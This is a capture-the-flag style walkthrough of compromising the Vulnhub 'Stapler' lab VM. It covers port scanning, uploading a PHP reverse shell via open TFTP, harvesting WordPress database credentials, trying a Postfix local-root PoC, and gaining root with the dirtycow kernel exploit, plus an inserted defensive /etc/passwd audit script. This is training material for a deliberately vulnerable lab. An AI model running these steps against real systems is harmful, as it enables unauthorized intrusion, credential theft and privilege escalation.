[Vulnhub] stapler - Walkthrough
Vulnhub URI: https://www.vulnhub.com/entry/stapler-1,150/
Victim: 192.168.56.103
Attacker: 192.168.56.102
I used the silliest way to root this VM so do not laugh at me...
First, netdiscover -r 192.168.56.0/24 to find the victim's IP.
Then a quick nmap:
root@kali:~/vulnerhub/stapler# cat nmap.rst
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 11:49 EDT
Nmap scan report for 192.168.56.103
Host is up (-0.0050s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 37.33 seconds
Several ports are open; I checked port 80 first.

It looks like a vulnerable site because it seems to just fetch files from the server and return them to users.
nikto didn't return anything, but dirb gave me interesting entries:
root@kali:~/vulnerhub/stapler# dirb http://192.168.56.103 /usr/share/wordlists/dirb/big.txt -X ,.php,.js,.html
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 24 15:20:57 2017
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
EXTENSIONS_LIST: (,.php,.js,.html) | ()(.php)(.js)(.html) [NUM = 4]
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.56.103/.profile (CODE:200|SIZE:675)
(!) FATAL: Too many errors connecting to host
(Possible cause: EMPTY REPLY FROM SERVER)
-----------------
END_TIME: Thu Aug 24 15:21:08 2017
DOWNLOADED: 9600 - FOUND: 2
Looks like the location of the web content is a home directory.
I tried ../../../../../etc/passwd, .bash_history and .ssh/known_hosts, but they didn't work, which means it is either restricting directory traversal or just a trolling page.
Assuming it's the good situation, if we could find a way to upload a file here we might be able to get a shell, or else prove it's a fake page.
By this time my nmap UDP scan had finished, and the result is promising:
root@kali:~/vulnerhub/stapler/note# nmap -Pn -sU 192.168.56.103
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 12:08 EDT
Stats: 0:10:02 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 57.19% done; ETC: 12:25 (0:07:19 remaining)
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
53/udp open domain
68/udp open|filtered dhcpc
69/udp open|filtered tftp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1100.98 seconds
Look at that! tftp!
root@kali:~/vulnerhub/stapler# tftp
tftp> connect 192.168.56.103
tftp> get .bashrc
Received 3888 bytes in 0.0 seconds
tftp> put shell.php
Sent 5688 bytes in 0.0 seconds
tftp>
Great!
Looks like the tftp root is the same directory as the port 80 service, and I can upload a file to that path.
My shell.php is based on /usr/share/webshells/php/php-reverse-shell.php.
Time to receive the shell.
Go and visit http://192.168.56.103/shell.php, then the shell comes in:
root@kali:~/vulnerhub/stapler# nc -l -p 9004
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
15:35:36 up 2:49, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1028(www) gid=1028(www) groups=1028(www)
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ cd /home/www
$ ls -la
total 72
drwxrwxrwx 2 www www 4096 Aug 24 14:50 .
drwxr-xr-x 32 root root 4096 Jun 4 2016 ..
-rw-r--r-- 1 www www 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 www www 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 www www 675 Sep 1 2015 .profile
-rw-r--r-- 1 nobody nogroup 5496 Aug 24 15:31 shell.php
All right, the privilege escalation part.
Honestly, my first thought was to exploit overlayfs or use cowroot because the kernel version is old. But I wanted to explore more before firing the bullet.
So I did some recon work.
/etc/passwd:
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash
I checked all of their home directories, but none of them has any interesting files.
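A small audit of /etc/passwd entries like the listing above, added here as an example (not part of the original walkthrough). It flags what a defender would look at first: accounts with interactive login shells, an empty shell field (the www entry above has one; per passwd(5) that defaults to /bin/sh), UID-0 accounts other than root, and duplicate UIDs. The sample input is a few lines from this listing plus one made-up "toor" entry so the UID-0 check has something to report.

```python
from collections import Counter

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Constructed sample: lines copied from the listing in this walkthrough
# plus a made-up extra UID-0 entry ("toor") to exercise that check.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
www:x:1028:1028::/home/www:
toor:x:0:0::/root:/bin/bash
"""

def parse_passwd(text: str) -> list[dict]:
    """Split passwd lines into dicts; blank and malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, _, uid, gid, gecos, home, shell = parts
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries

def audit_passwd(text: str) -> dict[str, list[str]]:
    """Return account names grouped by finding, in file order."""
    entries = parse_passwd(text)
    uid_counts = Counter(e["uid"] for e in entries)
    findings = {"interactive": [], "empty_shell": [], "extra_uid0": [], "dup_uid": []}
    for e in entries:
        if e["shell"] == "":
            findings["empty_shell"].append(e["name"])   # empty field means /bin/sh
        elif e["shell"] not in NOLOGIN_SHELLS:
            findings["interactive"].append(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings["extra_uid0"].append(e["name"])
        if uid_counts[e["uid"]] > 1:
            findings["dup_uid"].append(e["name"])
    return findings

if __name__ == "__main__":
    for kind, names in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{kind}: {', '.join(names) or '-'}")
```

Point it at a real file with `audit_passwd(open("/etc/passwd").read())`; the interactive list is the set of accounts worth checking for weak credentials or stray keys.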
netstat:
$ netstat -nplt
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1434/php
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:666 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
/var/www/:
$ pwd
/var/www/https
$ ls -la
total 460
drwxr-xr-x 5 root root 4096 Jun 5 2016 .
drwxr-xr-x 3 root root 4096 Jun 6 2016 ..
drwxr-xr-x 2 root root 4096 Jun 3 2016 admin112233
drwxr-xr-x 2 root root 4096 Jun 4 2016 announcements
drwxr-xr-x 5 root root 4096 Jun 4 2016 blogblog
-rw-r--r-- 1 root root 434538 Jun 3 2016 custom_400.html
-rw-r--r-- 1 root root 92 Jun 4 2016 .htaccess
-rw-r--r-- 1 root root 21 Jun 5 2016 index.html
-rw-r--r-- 1 root root 59 Jun 3 2016 robots.txt
$ cat robots.txt
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
Here I found something, namely the credentials for mysql.
$ cd blogblog
$ ls
index.php
license.txt
readme.html
wordpress-4.2.1.tar.gz
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-config-sample.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$ cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'plbkac');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8mb4');
define('DB_COLLATE', '');
$
So log in to mysql:
root@kali:~/vulnerhub/stapler# mysql -h 192.168.56.103 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| loot |
| mysql |
| performance_schema |
| phpmyadmin |
| proof |
| sys |
| wordpress |
+--------------------+
8 rows in set (0.00 sec)
There are many passwords and usernames inside those DBs, but I'm not sure which are for SSH.
At this point, I went back to the reverse shell and tried to follow the traditional way:
$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null
/var/mail
/var/local
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/expiry
/usr/bin/newgidmap
/usr/bin/ssh-agent
/usr/bin/chage
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/wall
/usr/bin/crontab
/usr/bin/gpasswd
/usr/bin/ubuntu-core-launcher
/usr/bin/screen
/usr/local/share/fonts
/usr/local/share/zsh/site-functions
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/entities
/usr/local/share/sgml/misc
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/entities
/usr/local/share/xml/misc
/usr/local/share/xml/declaration
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/i386-linux-gnu/utempter/utempter
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/authbind/helper
/usr/sbin/postqueue
/usr/sbin/postdrop
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/ping6
/bin/su
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
Here I saw two files: postqueue and postdrop. I googled them; it turns out they belong to the postfix service, which also showed up in /etc/passwd.
I searched for an exploit for it and found one: https://www.exploit-db.com/exploits/6337/
But it didn't work because I did not have write permission on /var/mail:
$ ./epl.sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
[*] Postfix seems to be installed
[*] Hardlink to symlink not dereferenced
[!] Spool dir is not writable
And that directory belongs to www-data, but I was logged in as www.
$ ls -l /var/mail
total 48
-rw-r--r-- 1 root mail 1 Jun 4 2016 root
-rw------- 1 www-data mail 39991 Jun 5 2016 www-data
$ whoami
www
All I need is data :D
So I was wondering if I could start some web service, get a reverse shell as www-data, and then use this exploit.
Or, if I found a way to SSH in as another user, maybe there was another way waiting for me.
So I started to try those kernel exploits at this point. :D
First I tried overlayfs, but it's not vulnerable; then I tried cowroot and went back to mysql to search for more information without checking the result (I thought it was stuck! seriously).
I did find many hashed passwords and messages inside the DB, but I couldn't crack them with john in that short time.
While I was cracking those passwords, I went back to the 'stuck' reverse shell and typed something:
$ ./cowroot
whoami
root
cd /root
ls
fix-wordpress.sh
flag.txt
issue
python.sh
wordpress.sql
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
Oh my. Happiness came when I wasn't prepared for it.
Other things
Oh, besides that, I also tried other ports.
From port 666 I got a message2.jpg, which looks like this:

And also:
root@kali:~/vulnerhub/stapler/message# steghide --info message2.jpg
"message2.jpg":
format: jpeg
capacity: 318.0 Byte
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
I didn't figure out the password yet.
(please check the previous part for root and flag)
Again, dirtycow is really powerful.
There are other ways to get a reverse shell and root it; I believe those other ways are more interesting.
Thanks to g0tmi1k for providing this good practice.